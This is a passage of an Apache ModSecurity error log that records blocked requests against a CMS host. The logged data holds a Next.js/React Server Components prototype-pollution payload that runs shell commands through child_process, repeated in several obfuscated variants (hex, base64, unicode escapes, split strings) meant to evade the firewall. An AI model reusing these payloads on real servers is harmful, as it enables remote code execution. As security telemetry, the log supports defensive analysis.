..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzpc83uMXRUE9zvQTKQAAAc0"] [Sun Apr 05 15:42:38.638859 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:45140] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzrxQSOrq_iRTM7dqIwAAARg"] [Sun Apr 05 15:42:38.640296 2026] [:error] [pid 31198:tid 31262] [client 172.94.9.253:45126] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzjT5TgrBR8xRnfXBAwAAAUo"] [Sun Apr 05 15:42:38.640558 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:45148] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzrxQSOrq_iRTM7dqJQAAAQo"] [Sun Apr 05 15:42:38.640567 2026] [:error] [pid 1503:tid 1514] [client 172.94.9.253:45170] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzkI7AjfUQYCN-J7DuwAAAMU"] [Sun Apr 05 15:42:38.712910 2026] [:error] [pid 1309:tid 1395] [client 172.94.9.253:45186] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzj-XKUNJEHmNu6G7xwAAAJg"] [Sun Apr 05 15:42:38.716037 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:45228] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmzpc83uMXRUE9zvQTKwAAAcg"] [Sun Apr 05 15:42:38.716060 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:45208] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmzpc83uMXRUE9zvQTKgAAAcU"] [Sun Apr 05 15:42:38.716091 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:45220] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmzrxQSOrq_iRTM7dqKAAAARY"] [Sun Apr 05 15:42:38.717513 2026] [:error] [pid 1503:tid 1539] [client 172.94.9.253:45240] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzkI7AjfUQYCN-J7DvAAAANc"] [Sun Apr 05 15:42:38.717717 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:45218] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmzrxQSOrq_iRTM7dqKQAAAQI"] [Sun Apr 05 15:42:38.718175 2026] [:error] [pid 31198:tid 31271] [client 172.94.9.253:45202] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmzjT5TgrBR8xRnfXBBAAAAVM"] [Sun Apr 05 15:42:38.718791 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:45174] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmzpc83uMXRUE9zvQTLAAAAcY"] [Sun Apr 05 15:42:38.764820 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:45198] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzrxQSOrq_iRTM7dqJwAAAQM"] [Sun Apr 05 15:42:38.805846 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:45222] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzrxQSOrq_iRTM7dqKgAAARA"] [Sun Apr 05 15:42:38.821954 2026] [:error] [pid 22788:tid 22810] [client 172.94.9.253:45266] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmziLbhFL16Wsx-C9DCgAAAZQ"] [Sun Apr 05 15:42:38.822179 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:45292] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmzrxQSOrq_iRTM7dqKwAAAQs"] [Sun Apr 05 15:42:38.822406 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:45256] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmzrxQSOrq_iRTM7dqLgAAARY"] [Sun Apr 05 15:42:38.823153 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:45250] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzpc83uMXRUE9zvQTLwAAAcE"] [Sun Apr 05 15:42:38.852967 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:45270] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 